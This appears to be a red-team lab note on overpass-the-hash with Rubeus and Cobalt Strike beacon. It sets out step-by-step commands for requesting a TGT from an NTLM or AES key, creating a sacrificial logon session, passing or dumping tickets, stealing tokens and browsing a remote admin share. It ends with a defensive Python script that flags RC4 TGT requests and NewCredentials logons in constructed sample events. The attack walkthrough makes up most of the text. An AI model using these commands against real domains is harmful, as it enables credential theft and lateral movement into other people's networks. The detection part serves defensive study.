Over Pass The Hash

Rubeus lets us perform overpass-the-hash (OPtH) without needing elevated privileges: the NTLM or AES key of the target user is used to request a Kerberos TGT, and that ticket is then used from a separate logon session. The process to follow is:

  • Request a TGT for the user we want to impersonate.

  • Create a sacrificial logon session.

  • Pass the TGT into that logon session.

  • Access the target resource.

Request the TGT with the user's RC4 (NTLM) key:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jking /domain:dev.cyberbotic.io /rc4:4ffd3eabdce2e158d923ddec72de979e /nowrap

Or, with the user's AES256 key and /opsec, so the request uses AES like a normal Windows client instead of RC4:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jking /domain:dev.cyberbotic.io /aes256:a561a175e395758550c9123c748a512b4b5eb1a211cbd12a1b139869f0c94ec1 /nowrap /opsec

Create the sacrificial logon session with make_token (the password does not need to be valid; the session is only a container for the ticket), then confirm it holds no tickets yet:

beacon> make_token DEV\jking DummyPass
beacon> run klist

Write the base64 ticket returned by asktgt to a .kirbi file:

PS C:\> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))

Pass the TGT into the current (sacrificial) logon session and access the target resource:

beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
beacon> ls \\srv-2\c$

Drop the impersonation when done:

beacon> rev2self

With elevated privileges the steps can be combined into one command: /createnetonly starts a sacrificial process in a new logon session and passes the requested TGT into it, so only the token of that process needs to be stolen.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jking /domain:dev.cyberbotic.io /aes256:a561a175e395758550c9123c748a512b4b5eb1a211cbd12a1b139869f0c94ec1 /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe

beacon> steal_token 3044
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> ls \\srv-2\c$

Dump Tickets (Alternative Way)

If an existing logon session already holds a TGT, it can be dumped by LUID and passed into a fresh sacrificial session instead of requesting a new one.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe dump /service:krbtgt /luid:0x462eb /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]

beacon> steal_token 4872
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> ls \\srv-2\c$
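As an added defensive example (not part of these notes), a small Python check over constructed Windows Security events that surfaces the two artefacts the steps above leave behind: a 4768 TGT request with RC4 encryption (the /rc4 variant) and a 4624 NewCredentials logon (the sacrificial session from make_token or /createnetonly). Field names follow the Security log schema; the sample events and the 10.0.0.5 address are constructed.

```python
from typing import Iterable, List, Optional

# 4768 TicketEncryptionType values: 0x17 = RC4-HMAC, 0x12 = AES256, 0x11 = AES128.
RC4_HMAC = "0x17"
# 4624 LogonType 9 = NewCredentials (LOGON32_LOGON_NEW_CREDENTIALS), the logon
# type produced by make_token and by Rubeus createnetonly.
NEW_CREDENTIALS_LOGON = "9"


def classify(event: dict) -> Optional[str]:
    """Return a finding for one Security event, or None if it looks normal."""
    eid = event.get("EventID")
    if eid == 4768 and str(event.get("TicketEncryptionType", "")).lower() == RC4_HMAC:
        # A TGT requested with an RC4 key shows up as an RC4 AS-REQ; in a domain
        # where clients negotiate AES these should be rare and worth a look.
        return f"RC4 TGT request for {event.get('TargetUserName')} from {event.get('IpAddress')}"
    if eid == 4624 and str(event.get("LogonType")) == NEW_CREDENTIALS_LOGON:
        # The sacrificial session is a NewCredentials logon regardless of whether
        # the ticket was obtained with RC4 or with AES256 /opsec.
        return f"NewCredentials logon by {event.get('SubjectUserName')} via {event.get('ProcessName')}"
    return None


def scan(events: Iterable[dict]) -> List[str]:
    """Run classify() over a stream of parsed events and collect the findings."""
    return [f for f in (classify(e) for e in events) if f]


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jking", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"EventID": 4768, "TargetUserName": "jking", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "LogonType": "9", "SubjectUserName": "Administrator", "ProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4624, "LogonType": "3", "SubjectUserName": "jking", "ProcessName": "-"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The second sample (AES256, 0x12) is deliberately not flagged: it is what the /aes256 /opsec request looks like on the DC, so the logon type 9 event is the artefact that remains in that case.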
